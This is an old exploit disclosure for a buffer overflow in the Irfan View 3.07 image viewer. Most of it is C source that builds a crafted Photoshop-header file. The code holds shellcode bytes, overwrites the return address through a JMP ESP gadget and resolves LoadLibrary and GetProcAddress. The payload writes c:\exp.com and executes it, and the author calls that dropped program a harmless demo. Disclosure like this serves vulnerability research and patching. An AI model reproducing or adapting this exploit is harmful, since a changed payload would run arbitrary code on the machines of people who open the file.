The popular Image viewer "Irfan View32" contains the buffer overflow problem, this problem exists in the handling of Adobe Photoshop image file. This code generates the jpg file which contains the exploit code that generates "exp.com" in "c:\" and executes it. "exp.com" is a simple demo program, there is no danger.
5a4c0197a83f99d759c5a6f2d4a089f21af960881b1053185810e9ea7530d600
/*=============================================================================
Irfan View 3.07 Exploit
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#include <windows.h>
#define MAXBUF 0x22e0
#define RETADR 0x31E
#define FAKE_ADR 0x80101010
#define JMPESP_ADR 0xbffca4f7
#define HEAD "8BPS\0"
unsigned char exploit_code[300]={
0xEB,0x4F,0x5F,0x32,0xC0,0x88,0x47,0x0A,0x88,0x47,0x10,0x88,0x47,0x17,0x88,0x47,
0x1E,0x88,0x47,0x23,0x88,0x47,0x26,0x88,0x47,0x2D,0x88,0x47,0x3C,0x57,0xB8,0x50,
0x77,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xDB,0xB3,0x0B,0x8B,0xC7,0x03,0xC3,0x50,
0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x33,0xDB,0xB3,0x24,0x8B,0xC7,
0x03,0xC3,0x50,0xB3,0x32,0x8B,0xC7,0x03,0xC3,0x50,0xFF,0xD1,0x89,0x47,0x2E,0xEB,
0x02,0xEB,0x71,0x33,0xDB,0xB3,0x18,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x8B,0x47,0x2E,0x50,0x33,0xC0,0xB0,0x03,0x90,0x90,
0x50,0xB0,0x01,0x50,0x33,0xDB,0xB3,0x3D,0x03,0xDF,0x53,0xFF,0xD1,0x33,0xDB,0xB3,
0x11,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0x5F,
0x2E,0x53,0xFF,0xD0,0x33,0xDB,0xB3,0x27,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,
0x6E,0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0xB3,0x32,0x8B,0xCF,0x03,0xCB,0x51,0xFF,0xD0,
0x33,0xDB,0x53,0xB3,0x1F,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,
0xFF,0xD0,0xFF,0xD0,0xE8,0x39,0xFF,0xFF,0xFF,0x00
};
unsigned char exploit_data[1000]={
0xb0,0x13,0xcd,0x10,0xb0,0x0f,0xfe,0xc0,0xb4,0x0c,0xcd,0x10,0x03,0xd1,0x41,0x3c,
0x20,0x77,0xf1,0xeb,0xf1,0x00
};
int GetProcAddress_fcp[4]={0x32,0x5e,0x88,0xbc};
char string_buffer[1000] ="msvcrt.dll_fopen_fclose_fwrite_exit_wb_system_****";
char filename[100] = "c:\\exp.com";
main(int argc,char *argv[])
{
unsigned char buf[MAXBUF],l1,l2;
unsigned int ip,p1,p2,i;
FILE *fp;
if (argc<2){
printf("usage : %s outputfile\n",argv[0]);
exit(1);
}
memset(buf,0x90,MAXBUF); buf[MAXBUF]=0;
memcpy(buf,HEAD,4);
ip=JMPESP_ADR;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
buf[RETADR+6]=0xeb;
buf[RETADR+7]=0x04;
ip=FAKE_ADR;
buf[RETADR+8]=ip&0xff;
buf[RETADR+9]=(ip>>8)&0xff;
buf[RETADR+10]=(ip>>16)&0xff;
buf[RETADR+11]=(ip>>24)&0xff;
p1=(unsigned int)LoadLibrary;
p2=(unsigned int)GetProcAddress;
exploit_code[0x1f]=p1&0xff;
exploit_code[0x20]=(p1>>8)&0xff;
exploit_code[0x21]=(p1>>16)&0xff;
exploit_code[0x22]=(p1>>24)&0xff;
for (i=0;i<4;i++){
exploit_code[GetProcAddress_fcp[i] ]=p2&0xff;
exploit_code[GetProcAddress_fcp[i]+1]=(p2>>8)&0xff;
exploit_code[GetProcAddress_fcp[i]+2]=(p2>>16)&0xff;
exploit_code[GetProcAddress_fcp[i]+3]=(p2>>24)&0xff;
}
l1=strlen(filename)+strlen(string_buffer);
l2=strlen(exploit_data);
strcat(string_buffer,filename );
strcat(string_buffer,"_" );
strcat(string_buffer,exploit_data );
strcat(exploit_code, string_buffer );
exploit_code[0x1c] = l1;
exploit_code[0x6d] = l2;
exploit_code[0x77] = l1+1;
memcpy(buf+RETADR+12,exploit_code,strlen(exploit_code));
if ((fp=fopen(argv[1],"wb"))==NULL){
printf("Can not write file '%s'\n",argv[1]);
exit(1);
}
fwrite(buf,1,MAXBUF,fp);
fclose(fp);
printf("Done.\n");
return FALSE;
}